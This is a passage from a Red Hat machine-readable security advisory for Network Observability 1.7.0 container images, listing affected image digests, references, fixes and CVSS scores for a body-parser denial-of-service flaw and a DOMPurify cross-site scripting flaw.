"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-45590"
},
{
"category": "external",
"summary": "RHBZ#2311171",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311171"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-45590",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45590"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-45590",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45590"
},
{
"category": "external",
"summary": "https://github.com/expressjs/body-parser/commit/b2695c4450f06ba3b0ccf48d872a229bb41c9bce",
"url": "https://github.com/expressjs/body-parser/commit/b2695c4450f06ba3b0ccf48d872a229bb41c9bce"
},
{
"category": "external",
"summary": "https://github.com/expressjs/body-parser/security/advisories/GHSA-qwcr-r2fm-qrc7",
"url": "https://github.com/expressjs/body-parser/security/advisories/GHSA-qwcr-r2fm-qrc7"
}
],
"release_date": "2024-09-10T16:15:21.083000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-22T01:05:39+00:00",
"details": "For details on how to apply this update, refer to: \n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8014"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "body-parser: Denial of Service Vulnerability in body-parser"
},
{
"cve": "CVE-2024-45801",
"cwe": {
"id": "CWE-1333",
"name": "Inefficient Regular Expression Complexity"
},
"discovery_date": "2024-09-16T19:20:09.863249+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2312631"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in DOMPurify. This issue may allow an attacker to use specially-crafted HTML to bypass the depth checking or use Prototype Pollution to weaken the depth check, which can lead to cross site scripting (XSS) attacks.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "dompurify: XSS vulnerability via prototype pollution",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The vulnerability in DOMPurify, while significant, is categorized as moderate severity rather than important due to its specific conditions for exploitation. The issue requires not only a sophisticated nesting technique to bypass the depth checks but also the ability to leverage Prototype Pollution to weaken these protections. This makes the attack scenario relatively complex and less likely to be encountered in general use cases. Furthermore, the flaw impacts only certain configurations and usage patterns, thus reducing its immediate risk.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-45801"
},
{
"category": "external",
"summary": "RHBZ#2312631",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2312631"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-45801",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45801"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-45801",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45801"
},
{
"category": "external",
"summary": "https://github.com/cure53/DOMPurify/commit/1e520262bf4c66b5efda49e2316d6d1246ca7b21",
"url": "https://github.com/cure53/DOMPurify/commit/1e520262bf4c66b5efda49e2316d6d1246ca7b21"
},
{
"category": "external",
"summary": "https://github.com/cure53/DOMPurify/commit/26e1d69ca7f769f5c558619d644d90dd8bf26ebc",
"url": "https://github.com/cure53/DOMPurify/commit/26e1d69ca7f769f5c558619d644d90dd8bf26ebc"
},
{
"category": "external",
"summary": "https://github.com/cure53/DOMPurify/security/advisories/GHSA-mmhx-hmjr-r674",
"url": "https://github.com/cure53/DOMPurify/security/advisories/GHSA-mmhx-hmjr-r674"
}
],
"release_date": "2024-09-16T19:16:11.080000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-22T01:05:39+00:00",
"details": "For details on how to apply this update, refer to: \n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
